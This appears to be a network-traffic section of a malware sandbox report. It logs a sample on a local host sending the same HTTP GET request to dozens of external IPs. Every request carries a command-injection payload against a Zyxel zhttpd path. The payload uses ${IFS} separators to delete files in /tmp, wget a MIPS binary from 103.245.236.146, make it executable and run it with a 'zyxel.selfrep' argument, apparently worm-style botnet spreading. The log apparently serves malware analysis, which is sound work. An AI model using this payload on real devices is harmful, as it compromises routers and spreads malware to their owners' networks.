                                                        Jan 28, 2024 10:12:42.196947098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1694192.168.2.145328490.215.107.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.196976900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1695192.168.2.1451892114.172.51.195443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197016954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1696192.168.2.1442414163.228.213.112443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197058916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1697192.168.2.144461669.140.176.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197087049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1698192.168.2.1460036136.233.163.33443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197124004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1699192.168.2.143913048.117.235.134443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197181940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1700192.168.2.145192261.164.58.12443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197199106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1701192.168.2.1451030112.239.200.58443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197235107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1702192.168.2.144425680.212.12.142443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197278023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1703192.168.2.1438808166.30.220.174443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197304010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1704192.168.2.145004631.23.116.135443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197352886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1705192.168.2.1460856145.216.45.241443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197372913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1706192.168.2.1449212131.33.36.88443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197411060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1707192.168.2.1436848206.115.251.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197448015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1708192.168.2.1443412116.44.248.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197494984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1709192.168.2.1453342124.255.174.121443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197521925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1710192.168.2.1452146113.220.80.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197544098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1711192.168.2.143359264.53.188.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197578907 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1712192.168.2.1449454132.221.81.42443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197638988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1713192.168.2.145722098.248.10.206443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197673082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1714192.168.2.144807832.191.70.1443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197726011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1715192.168.2.1460600222.79.172.13443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197767973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1716192.168.2.1435060187.199.254.91443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197803020 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1717192.168.2.1443644111.82.32.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197839022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1718192.168.2.145934070.212.126.147443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197865963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1719192.168.2.1447606121.131.154.27443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197906971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1720192.168.2.145420259.202.56.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197928905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1721192.168.2.1455410103.24.24.249443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.197985888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1722192.168.2.1456966166.228.116.156443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198014975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1723192.168.2.1439440140.180.139.70443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198045969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1724192.168.2.144288036.161.36.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198092937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1725192.168.2.1437460212.122.25.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198142052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1726192.168.2.145088447.136.0.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198177099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1727192.168.2.1460512114.151.101.63443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198211908 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1728192.168.2.144916445.91.198.37443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198226929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1729192.168.2.1447086160.214.13.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198259115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1730192.168.2.143725040.4.129.74443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198303938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1731192.168.2.1448372150.198.120.177443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198329926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1732192.168.2.1450348192.135.122.86443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198391914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1733192.168.2.143728253.102.54.71443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198431969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1734192.168.2.14548842.93.120.250443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198470116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1735192.168.2.1456192149.28.181.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198527098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1736192.168.2.1437714135.193.79.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198556900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1737192.168.2.143563060.199.231.77443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198595047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1738192.168.2.1438522188.3.129.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198636055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1739192.168.2.1446694194.49.38.205443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198668957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1740192.168.2.143326850.140.18.122443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198703051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1741192.168.2.1438422171.77.205.248443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198755026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1742192.168.2.144110671.246.168.125443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198791981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1743192.168.2.1440152203.132.128.137443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198832035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1744192.168.2.14467125.189.160.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198873997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1745192.168.2.143382061.165.159.208443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198908091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1746192.168.2.145753836.236.171.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.198960066 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1747192.168.2.1446848143.32.1.99443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199007988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1748192.168.2.1459242177.32.105.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199038029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1749192.168.2.14498609.193.229.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199065924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1750192.168.2.1458028112.142.207.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199095011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1751192.168.2.1451460191.33.168.176443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199120998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1752192.168.2.144712650.178.231.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199165106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1753192.168.2.145898897.149.245.227443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:42.199229956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1754192.168.2.145980468.114.191.82443
                                                        TimestampBytes transferredDirectionData
